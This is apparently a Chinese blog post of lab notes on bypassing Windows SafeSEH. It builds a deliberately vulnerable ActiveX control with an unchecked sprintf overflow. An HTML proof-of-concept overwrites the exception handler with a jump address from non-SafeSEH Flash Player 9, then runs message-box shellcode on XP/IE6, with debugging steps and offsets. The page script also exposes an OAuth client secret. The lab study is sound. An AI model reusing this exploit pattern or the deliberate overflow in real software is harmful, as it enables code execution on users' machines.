<h3 id="6-利用Adobe-Flash-Player-ActiveX控件绕过SafeSEH"><a href="#6-利用Adobe-Flash-Player-ActiveX控件绕过SafeSEH" class="headerlink" title="6. 利用Adobe Flash Player ActiveX控件绕过SafeSEH"></a>6. 利用Adobe Flash Player ActiveX控件绕过SafeSEH</h3><p>该方法就是利用未启用SafeSEH模块绕过SafeSEH的浏览器版。Flash Player ActiveX在9.2.124之前的版本不支持SafeSEH，所以若我们能够在这个控件中找到合适的跳板地址，就可以绕过SafeSEH。</p>
<h4 id="6-1-绕过SafeSEH需要三方面的支持"><a href="#6-1-绕过SafeSEH需要三方面的支持" class="headerlink" title="6.1 绕过SafeSEH需要三方面的支持"></a>6.1 绕过SafeSEH需要三方面的支持</h4><ol>
<li>具有溢出漏洞的ActiveX控件</li>
<li>未启用SafeSEH的Flash Player ActiveX控件</li>
<li>可以触发ActiveX控件中溢出漏洞的POC页面</li>
</ol>
<h4 id="6-2-基于MFC的ActiveX控件"><a href="#6-2-基于MFC的ActiveX控件" class="headerlink" title="6.2 基于MFC的ActiveX控件"></a>6.2 基于MFC的ActiveX控件</h4><p>建立好控件工程后，使用类视图中的&quot;VulnerAX_SEHLib-&gt;DVulnerAX-&gt;Add-&gt;Add Method&quot;，添加一个可以在Web页面中调用的接口函数，函数返回类型为void，函数名为test，参数类型为BSTR，参数名为str</p>
<p>VulnerAX_SEHCtrl.cpp中的test函数</p>
<pre><code>
DWORD MyException(void)
{
    printf("There is an exception");
    getchar();
    return 1;
}

// CVulnerAX_SEHCtrl message handlers

void CVulnerAX_SEHCtrl::test(LPCTSTR str)
{
    //AFX_MANAGE_STATE(AfxGetStaticModuleState());
    // TODO: Add your dispatch handler code here
    printf("aaaa");        //定位该函数的标记
    char dest[100];
    sprintf(dest, "%s", str);
    int zero = 0;
    __try
    {
        zero = 1/zero;
    }
    __except(MyException())
    {
    }
}

</code></pre>

<p><b>实验环境：</b></p>
<table>
<thead>
<tr>
<th></th>
<th>推荐使用环境</th>
<th>备注</th>
</tr>
</thead>
<tbody>
<tr>
<td>操作系统</td>
<td>Windows XP SP3</td>
<td></td>
</tr>
<tr>
<td>编译器</td>
<td>Visual Studio 2008</td>
<td></td>
</tr>
<tr>
<td>优化</td>
<td><font color="#f00">禁用优化选项</font></td>
<td></td>
</tr>
<tr>
<td>MFC</td>
<td>在静态库中使用MFC</td>
<td>工程属性-&gt;General-&gt;Use of MFC</td>
</tr>
<tr>
<td>字符集</td>
<td>使用Unicode字符集</td>
<td>工程属性-&gt;General-&gt;Character Set</td>
</tr>
<tr>
<td>build版本</td>
<td>release版本</td>
</tr>
</tbody>
</table>
<p>编译好控件之后，在实验机器上注册该ActiveX控件.regsvr32</p>
<h4 id="6-3-POC"><a href="#6-3-POC" class="headerlink" title="6.3 POC"></a>6.3 POC</h4><pre><code>
&lt;html&gt;
&lt;body&gt;
&lt;embed src="map.swf" quality="high" type="application/x-shockwave-flash" width="160"
height="260"&gt;&lt;/embed&gt;
&lt;object classid="clsid:F010E769-5E95-4DBB-943D-AF2D1FE10C34" id="test"&gt;&lt;/object&gt;
&lt;script&gt;
var s = "\u9090";
while (s.length &lt; 60) {
    s += "\u9090";
}
s += "\u0EEB\u9090";
s += "\uA0C6\u021D";
s += "\u9090\u9090\u9090\u9090";
s += "\u68fc\u0a6a\u1e38\u6368\ud189\u684f\u7432\u0c91\uf48b\u7e8d\u33f4\ub7db\u2b04\u66e3\u33bb\u5332\u7568\u6573\u5472\ud233\u8b64\u305a\u4b8b\u8b0c\u1c49\u098b\u698b\uad08\u6a3d\u380a\u751e\u9505\u57ff\u95f8\u8b60\u3c45\u4c8b\u7805\ucd03\u598b\u0320\u33dd\u47ff\u348b\u03bb\u99f5\ube0f\u3a06\u74c4\uc108\u07ca\ud003\ueb46\u3bf1\u2454\u751c\u8be4\u2459\udd03\u8b66\u7b3c\u598b\u031c\u03dd\ubb2c\u5f95\u57ab\u3d61\u0a6a\u1e38\ua975\udb33\u6853\u6577\u7473\u6668\u6961\u8b6c\u53c4\u5050\uff53\ufc57\uff53\uf857";
test.test(s);
&lt;/script&gt;

&lt;/body&gt;
&lt;/html&gt;
</code></pre>

<p>这个代码和书上的不一致，但是完全正确。需要注意的是，我们使用的embed中的map.swf需要和该html在同一文件夹下，而object中的classid其实可以从VulnerAX_SEH.idl中找到。注意只能是下面代码中那处显示的uuid，其它位置处的都不行！！！</p>
<pre><code>
    //  Class information for CVulnerAX_SEHCtrl

    [ uuid(F010E769-5E95-4DBB-943D-AF2D1FE10C34),
      helpstring("VulnerAX_SEH Control"), control ]
    coclass VulnerAX_SEH
    {
        [default] dispinterface _DVulnerAX_SEH;
        [default, source] dispinterface _DVulnerAX_SEHEvents;
    };
</code></pre>

<h4 id="6-5-实验内容"><a href="#6-5-实验内容" class="headerlink" title="6.5 实验内容"></a>6.5 实验内容</h4><p><b>实验思路：</b></p>
<ol>
<li>在POC页面中随便插入一个Flash，让浏览器能够加载Flash控件</li>
<li>在POC页面中调用VulnerAX_SEH.ocx控件中的test函数，并向其传递超长字符串，以触发test函数中的溢出漏洞。</li>
<li>通过溢出手段将VulnerAX_SEH.ocx中的异常处理函数地址覆盖为Flash控件中的跳转地址。由于Flash控件没有启用SafeSEH，所以这个跳板地址可以绕过SafeSEH</li>
<li>Test函数触发除0异常后，程序会去调用异常处理函数，由于异常处理函数地址已经被覆盖，所以劫持了程序流程。</li>
</ol>
<p><b>实验环境：</b></p>
<table>
<thead>
<tr>
<th></th>
<th>推荐使用环境</th>
<th>备注</th>
</tr>
</thead>
<tbody>
<tr>
<td>操作系统</td>
<td>Windows XP SP3</td>
<td></td>
</tr>
<tr>
<td>浏览器</td>
<td>Internet Explorer 6</td>
<td></td>
</tr>
<tr>
<td>Flash控件版本</td>
<td>9.0.115.0</td>
<td>未启用SafeSEH的最后一版9.2.124</td>
</tr>
</tbody>
</table>
<p><b>实验步骤：</b></p>
<ol>
<li>修改POC，将s设置为90字节的0x90，用IE访问POC页面。</li>
<li>如果浏览器提示ActiveX控件被拦截等信息请自行设置浏览器权限，当浏览器弹出下图所示对话框，就可以用Ollydbg附加IE的进程<font color="#f00">（打开Ollydbg，点击File-&gt;attach，找到IExplorer进程，attach上去即可）</font>，附加好后按F9让程序继续运行<br><img src="/images/2017-07-08/activex.jpg" alt="ActiveX提示"></li>
<li>找到VulnerAX_SEH.ocx的内存空间，查找字符串&quot;aaaa&quot;，在此位置设置好断点0x100017DC<font color="#f00">（这是最近两天才发现的，设置断点一定要在CPU主界面设置，否则就设置不成功！）</font>。我的方法如下图:先在Memory窗口中找到VulnerAX_SEH所在位置，然后搜索字符串&quot;aaaa&quot;，在rdata中找到了字符串，记下地址0x1003F9F8，再在.text中找字符串&quot;\xF8\xF9\x03\x10&quot;，就可以找到printf(&quot;aaaa&quot;)的位置<br><img src="/images/2017-07-08/breakpoint_printf_aaaa.jpg" alt="查找函数的方法"></li>
<li>点击浏览器对话框中的&quot;是&quot;按钮，程序会中断在我们设置好的断点位置</li>
<li>单步执行完sprintf(0x100017F9)之后，得到数据：溢出字符串的起始位置0x0012E014；离栈顶最近的异常处理函数句柄在0x0012E08C+4。故需填充124(0x7C)个字节就可以覆盖到异常处理函数地址。</li>
<li>在Flash控件中搜索跳板指令。<font color="#f00">通过OllySEEH找到/SafeSEH OFF区域，如图所示。</font>然后使用OllyFindAddr插件的Find CALL/JMP [EBP+N]选项来查找，最后在flash.ocx中找到了多条跳板。如图所示：我们使用0x021DA0C6处的CALL [EBP-0x18]作为跳板<font color="#f00">（不知道怎么回事，有些跳板地址用不了，当你输入0x02187625，但是进入函数之后跳板地址就变为了0x02137625）</font><br><img src="/images/2017-07-08/safeseh.jpg" alt="SafeSEH展示"><br><img src="/images/2017-07-08/call_jmp.jpg" alt="跳板指令"></li>
<li>程序执行跳板指令后，会回到SEH的链表指针所在地址。即&quot;\u9090\u9090\uA0C6\u021D&quot;处。</li>
</ol>
<p><b>shellcode组成：</b></p>
<ol>
<li>120字节0x90   60 * &quot;\u9090&quot;</li>
<li>向后短跳16字节 &quot;\u0EEB\u9090&quot;</li>
<li>Flash控件的跳板指令地址 &quot;\uA0C6\u021D&quot;</li>
<li>8字节的0x90填充    &quot;\u9090\u9090\u9090\u9090&quot;</li>
<li>168字节的弹出对话框机器码<br>&quot;\u68fc\u0a6a\u1e38\u6368\ud189\u684f\u7432\u0c91\uf48b\u7e8d\u33f4\ub7db\u2b04\u66e3<br>\u33bb\u5332\u7568\u6573\u5472\ud233\u8b64\u305a\u4b8b\u8b0c\u1c49\u098b\u698b\uad08<br>\u6a3d\u380a\u751e\u9505\u57ff\u95f8\u8b60\u3c45\u4c8b\u7805\ucd03\u598b\u0320\u33dd<br>\u47ff\u348b\u03bb\u99f5\ube0f\u3a06\u74c4\uc108\u07ca\ud003\ueb46\u3bf1\u2454\u751c<br>\u8be4\u2459\udd03\u8b66\u7b3c\u598b\u031c\u03dd\ubb2c\u5f95\u57ab\u3d61\u0a6a\u1e38<br>\ua975\udb33\u6853\u6577\u7473\u6668\u6961\u8b6c\u53c4\u5050\uff53\ufc57\uff53\uf857&quot;</li>
</ol>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/windows/" rel="tag"># windows</a>
          
            <a href="/tags/SEH/" rel="tag"># SEH</a>
          
        </div>
      

      
      
        <div class="post-widgets">
        
          <div class="wp_rating">
            <div id="wpac-rating"></div>
          </div>
        

        
        </div>
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2017/07/07/0day/SafeSEH的保护原理以及攻击方法/" rel="next" title="SafeSEH的保护原理以及攻击方法">
                <i class="fa fa-chevron-left"></i> SafeSEH的保护原理以及攻击方法
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2017/07/09/0day/DEP机制的保护原理/" rel="prev" title="DEP机制的保护原理">
                DEP机制的保护原理 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          
  <div class="comments" id="comments">
    
      <div id="gitalk-container"></div>
    
  </div>


        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
      <div id="sidebar-dimmer"></div>
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap" >
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
          <img class="site-author-image" itemprop="image"
               src="/images/me.jpg"
               alt="Introspelliam" />
          <p class="site-author-name" itemprop="name">Introspelliam</p>
           
              <p class="site-description motion-element" itemprop="description"></p>
           
        </div>
        <nav class="site-state motion-element">

          
            <div class="site-state-item site-state-posts">
            
              <a href="/archives/">
            
                <span class="site-state-item-count">125</span>
                <span class="site-state-item-name">日志</span>
              </a>
            </div>
          

          
            
            
            <div class="site-state-item site-state-categories">
              <a href="/categories/index.html">
                <span class="site-state-item-count">17</span>
                <span class="site-state-item-name">分类</span>
              </a>
            </div>
          

          
            
            
            <div class="site-state-item site-state-tags">
              <a href="/tags/index.html">
                <span class="site-state-item-count">56</span>
                <span class="site-state-item-name">标签</span>
              </a>
            </div>
          

        </nav>

        
          <div class="feed-link motion-element">
            <a href="/atom.xml" rel="alternate">
              <i class="fa fa-rss"></i>
              RSS
            </a>
          </div>
        

        <div class="links-of-author motion-element">
          
            
              <span class="links-of-author-item">
                <a href="https://github.com/Introspelliam" target="_blank" title="GitHub">
                  
                    <i class="fa fa-fw fa-github"></i>
                  
                    
                      GitHub
                    
                </a>
              </span>
            
              <span class="links-of-author-item">
                <a href="http://weibo.com/u/3008590672" target="_blank" title="Weibo">
                  
                    <i class="fa fa-fw fa-weibo"></i>
                  
                    
                      Weibo
                    
                </a>
              </span>
            
          
        </div>

        
        

        
        

        


      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#1-攻击返回地址绕过SafeSEH"><span class="nav-text">1. 攻击返回地址绕过SafeSEH</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-利用虚函数绕过SafeSEH"><span class="nav-text">2. 利用虚函数绕过SafeSEH</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#3-从堆中绕过SafeSEH"><span class="nav-text">3. 从堆中绕过SafeSEH</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#3-1-实验代码"><span class="nav-text">3.1 实验代码</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#3-2-实验内容"><span class="nav-text">3.2 实验内容</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#4-利用未启用SafeSEH模块绕过SafeSEH"><span class="nav-text">4. 利用未启用SafeSEH模块绕过SafeSEH</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#4-1-实验代码"><span class="nav-text">4.1 实验代码</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#4-2-实验内容"><span class="nav-text">4.2 实验内容</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#4-3-验证及其思考"><span class="nav-text">4.3 验证及其思考</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#5-利用加载模块之外的地址绕过SafeSEH"><span class="nav-text">5. 利用加载模块之外的地址绕过SafeSEH</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#5-1-实验代码"><span class="nav-text">5.1 实验代码</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#5-2-实验内容"><span class="nav-text">5.2 实验内容</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#5-3-验证及其思考"><span class="nav-text">5.3 验证及其思考</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#6-利用Adobe-Flash-Player-ActiveX控件绕过SafeSEH"><span class="nav-text">6. 利用Adobe Flash Player ActiveX控件绕过SafeSEH</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#6-1-绕过SafeSEH需要三方面的支持"><span class="nav-text">6.1 绕过SafeSEH需要三方面的支持</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#6-2-基于MFC的ActiveX控件"><span class="nav-text">6.2 基于MFC的ActiveX控件</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#6-3-POC"><span class="nav-text">6.3 POC</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#6-5-实验内容"><span class="nav-text">6.5 实验内容</span></a></li></ol></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      
        <div class="back-to-top">
          <i class="fa fa-arrow-up"></i>
          
            <span id="scrollpercent"><span>0</span>%</span>
          
        </div>
      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright" >
  
  &copy; 
  <span itemprop="copyrightYear">2018</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Introspelliam</span>

  
</div>


  <div class="powered-by">由 <a class="theme-link" href="https://hexo.io">Hexo</a> 强力驱动</div>

  <span class="post-meta-divider">|</span>

  <div class="theme-info">主题 &mdash; <a class="theme-link" href="https://github.com/iissnan/hexo-theme-next">NexT.Mist</a> v5.1.2</div>


        
<div class="busuanzi-count">
  <script async src="https://dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script>

  
    <span class="site-uv">
      <i class="fa fa-user"></i>
      <span class="busuanzi-value" id="busuanzi_value_site_uv"></span>
      
    </span>
  

  
    <span class="site-pv">
      <i class="fa fa-eye"></i>
      <span class="busuanzi-value" id="busuanzi_value_site_pv"></span>
      
    </span>
  
</div>








        
      </div>
    </footer>

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>

  
  <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>

  
  <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.2"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.2"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.2"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.2"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.2"></script>



  


  




	





  





  








  <link rel="stylesheet" href="https://unpkg.com/gitalk/dist/gitalk.css">
  <script src="https://unpkg.com/gitalk/dist/gitalk.min.js"></script>
  <script src="/js/md5.min.js"></script>
   <script type="text/javascript">
        var gitalk = new Gitalk({
          clientID: '41857e5205be9fe36c48',
          clientSecret: 'c927ea37a432eff67cdb1081658112c7409ca7ff',
          repo: 'Introspelliam.github.io',
          owner: 'Introspelliam',
          admin: ['Introspelliam'],
          id: md5(location.pathname),
          distractionFreeMode: 'true'
        })
        gitalk.render('gitalk-container')           
       </script>



  

  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    var isXml = true;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length === 0) {
      search_path = "search.xml";
    } else if (/json$/i.test(search_path)) {
      isXml = false;
    }
    var path = "/" + search_path;
    // monitor main search box;

    var onPopupClose = function (e) {
      $('.popup').hide();
      $('#local-search-input').val('');
      $('.search-result-list').remove();
      $('#no-result').remove();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    }

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.search-popup-overlay').click(onPopupClose);
      $('.popup').toggle();
      var $localSearchInput = $('#local-search-input');
      $localSearchInput.attr("autocapitalize", "none");
      $localSearchInput.attr("autocorrect", "off");
      $localSearchInput.focus();
    }

    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';

      // start loading animation
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay">' +
          '<div id="search-loading-icon">' +
          '<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
          '</div>' +
          '</div>')
        .css('overflow', 'hidden');
      $("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');

      $.ajax({
        url: path,
        dataType: isXml ? "xml" : "json",
        async: true,
        success: function(res) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = isXml ? $("entry", res).map(function() {
            return {
              title: $("title", this).text(),
              content: $("content",this).text(),
              url: $("url" , this).text()
            };
          }).get() : res;
          var input = document.getElementById(search_id);
          var resultContent = document.getElementById(content_id);
          var inputEventFunction = function() {
            var searchText = input.value.trim().toLowerCase();
            var keywords = searchText.split(/[\s\-]+/);
            if (keywords.length > 1) {
              keywords.push(searchText);
            }
            var resultItems = [];
            if (searchText.length > 0) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var hitCount = 0;
                var searchTextCount = 0;
                var title = data.title.trim();
                var titleInLowerCase = title.toLowerCase();
                var content = data.content.trim().replace(/<[^>]+>/g,"");
                var contentInLowerCase = content.toLowerCase();
                var articleUrl = decodeURIComponent(data.url);
                var indexOfTitle = [];
                var indexOfContent = [];
                // only match articles with not empty titles
                if(title != '') {
                  keywords.forEach(function(keyword) {
                    function getIndexByWord(word, text, caseSensitive) {
                      var wordLen = word.length;
                      if (wordLen === 0) {
                        return [];
                      }
                      var startPosition = 0, position = [], index = [];
                      if (!caseSensitive) {
                        text = text.toLowerCase();
                        word = word.toLowerCase();
                      }
                      while ((position = text.indexOf(word, startPosition)) > -1) {
                        index.push({position: position, word: word});
                        startPosition = position + wordLen;
                      }
                      return index;
                    }

                    indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
                    indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
                  });
                  if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
                    isMatch = true;
                    hitCount = indexOfTitle.length + indexOfContent.length;
                  }
                }

                // show search results

                if (isMatch) {
                  // sort index by position of keyword

                  [indexOfTitle, indexOfContent].forEach(function (index) {
                    index.sort(function (itemLeft, itemRight) {
                      if (itemRight.position !== itemLeft.position) {
                        return itemRight.position - itemLeft.position;
                      } else {
                        return itemLeft.word.length - itemRight.word.length;
                      }
                    });
                  });

                  // merge hits into slices

                  function mergeIntoSlice(text, start, end, index) {
                    var item = index[index.length - 1];
                    var position = item.position;
                    var word = item.word;
                    var hits = [];
                    var searchTextCountInSlice = 0;
                    while (position + word.length <= end && index.length != 0) {
                      if (word === searchText) {
                        searchTextCountInSlice++;
                      }
                      hits.push({position: position, length: word.length});
                      var wordEnd = position + word.length;

                      // move to next position of hit

                      index.pop();
                      while (index.length != 0) {
                        item = index[index.length - 1];
                        position = item.position;
                        word = item.word;
                        if (wordEnd > position) {
                          index.pop();
                        } else {
                          break;
                        }
                      }
                    }
                    searchTextCount += searchTextCountInSlice;
                    return {
                      hits: hits,
                      start: start,
                      end: end,
                      searchTextCount: searchTextCountInSlice
                    };
                  }

                  var slicesOfTitle = [];
                  if (indexOfTitle.length != 0) {
                    slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
                  }

                  var slicesOfContent = [];
                  while (indexOfContent.length != 0) {
                    var item = indexOfContent[indexOfContent.length - 1];
                    var position = item.position;
                    var word = item.word;
                    // cut out 100 characters
                    var start = position - 20;
                    var end = position + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if (end < position + word.length) {
                      end = position + word.length;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
                  }

                  // sort slices in content by search text's count and hits' count

                  slicesOfContent.sort(function (sliceLeft, sliceRight) {
                    if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
                      return sliceRight.searchTextCount - sliceLeft.searchTextCount;
                    } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
                      return sliceRight.hits.length - sliceLeft.hits.length;
                    } else {
                      return sliceLeft.start - sliceRight.start;
                    }
                  });

                  // select top N slices in content

                  var upperBound = parseInt('1');
                  if (upperBound >= 0) {
                    slicesOfContent = slicesOfContent.slice(0, upperBound);
                  }

                  // highlight title and content

                  function highlightKeyword(text, slice) {
                    var result = '';
                    var prevEnd = slice.start;
                    slice.hits.forEach(function (hit) {
                      result += text.substring(prevEnd, hit.position);
                      var end = hit.position + hit.length;
                      result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
                      prevEnd = end;
                    });
                    result += text.substring(prevEnd, slice.end);
                    return result;
                  }

                  var resultItem = '';

                  if (slicesOfTitle.length != 0) {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
                  } else {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
                  }

                  slicesOfContent.forEach(function (slice) {
                    resultItem += "<a href='" + articleUrl + "'>" +
                      "<p class=\"search-result\">" + highlightKeyword(content, slice) +
                      "...</p>" + "</a>";
                  });

                  resultItem += "</li>";
                  resultItems.push({
                    item: resultItem,
                    searchTextCount: searchTextCount,
                    hitCount: hitCount,
                    id: resultItems.length
                  });
                }
              })
            };
            if (keywords.length === 1 && keywords[0] === "") {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>'
            } else if (resultItems.length === 0) {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>'
            } else {
              resultItems.sort(function (resultLeft, resultRight) {
                if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
                  return resultRight.searchTextCount - resultLeft.searchTextCount;
                } else if (resultLeft.hitCount !== resultRight.hitCount) {
                  return resultRight.hitCount - resultLeft.hitCount;
                } else {
                  return resultRight.id - resultLeft.id;
                }
              });
              var searchResultList = '<ul class=\"search-result-list\">';
              resultItems.forEach(function (result) {
                searchResultList += result.item;
              })
              searchResultList += "</ul>";
              resultContent.innerHTML = searchResultList;
            }
          }

          if ('auto' === 'auto') {
            input.addEventListener('input', inputEventFunction);
          } else {
            $('.search-icon').click(inputEventFunction);
            input.addEventListener('keypress', function (event) {
              if (event.keyCode === 13) {
                inputEventFunction();
              }
            });
          }

          // remove loading animation
          $(".local-search-pop-overlay").remove();
          $('body').css('overflow', '');

          proceedsearch();
        }
      });
    }

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched === false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(onPopupClose);
    $('.popup').click(function(e){
      e.stopPropagation();
    });
    $(document).on('keyup', function (event) {
      var shouldDismissSearchPopup = event.which === 27 &&
        $('.search-popup').is(':visible');
      if (shouldDismissSearchPopup) {
        onPopupClose();
      }
    });
  </script>





  

  
<script>
(function(){
    var bp = document.createElement('script');
    var curProtocol = window.location.protocol.split(':')[0];
    if (curProtocol === 'https') {
        bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';        
    }
    else {
        bp.src = 'http://push.zhanzhang.baidu.com/push.js';
    }
    var s = document.getElementsByTagName("script")[0];
    s.parentNode.insertBefore(bp, s);
})();
</script>


  
  <script type="text/javascript">
  wpac_init = window.wpac_init || [];
  wpac_init.push({widget: 'Rating', id: ,
    el: 'wpac-rating',
    color: 'fc6423'
  });
  (function() {
    if ('WIDGETPACK_LOADED' in window) return;
    WIDGETPACK_LOADED = true;
    var mc = document.createElement('script');
    mc.type = 'text/javascript';
    mc.async = true;
    mc.src = '//embed.widgetpack.com/widget.js';
    var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(mc, s.nextSibling);
  })();
  </script>


  
  
    <script type="text/x-mathjax-config">
      MathJax.Hub.Config({
        tex2jax: {
          inlineMath: [ ['$','$'], ["\\(","\\)"]  ],
          processEscapes: true,
          skipTags: ['script', 'noscript', 'style', 'textarea', 'pre', 'code']
        }
      });
    </script>

    <script type="text/x-mathjax-config">
      MathJax.Hub.Queue(function() {
        var all = MathJax.Hub.getAllJax(), i;
        for (i=0; i < all.length; i += 1) {
          all[i].SourceElement().parentNode.className += ' has-jax';
        }
      });
    </script>
    <script type="text/javascript" src="//cdn.bootcss.com/mathjax/2.7.1/latest.js?config=TeX-AMS-MML_HTMLorMML"></script><!-- hexo-inject:begin --><!-- Begin: Injected MathJax -->
<script type="text/x-mathjax-config">
  MathJax.Hub.Config("");
</script>

<script type="text/x-mathjax-config">
  MathJax.Hub.Queue(function() {
    var all = MathJax.Hub.getAllJax(), i;
    for(i=0; i < all.length; i += 1) {
      all[i].SourceElement().parentNode.className += ' has-jax';
    }
  });
</script>

<script type="text/javascript" src="custom_mathjax_source">
</script>
<!-- End: Injected MathJax -->
<!-- hexo-inject:end -->
  


  

  

</body>
</html>
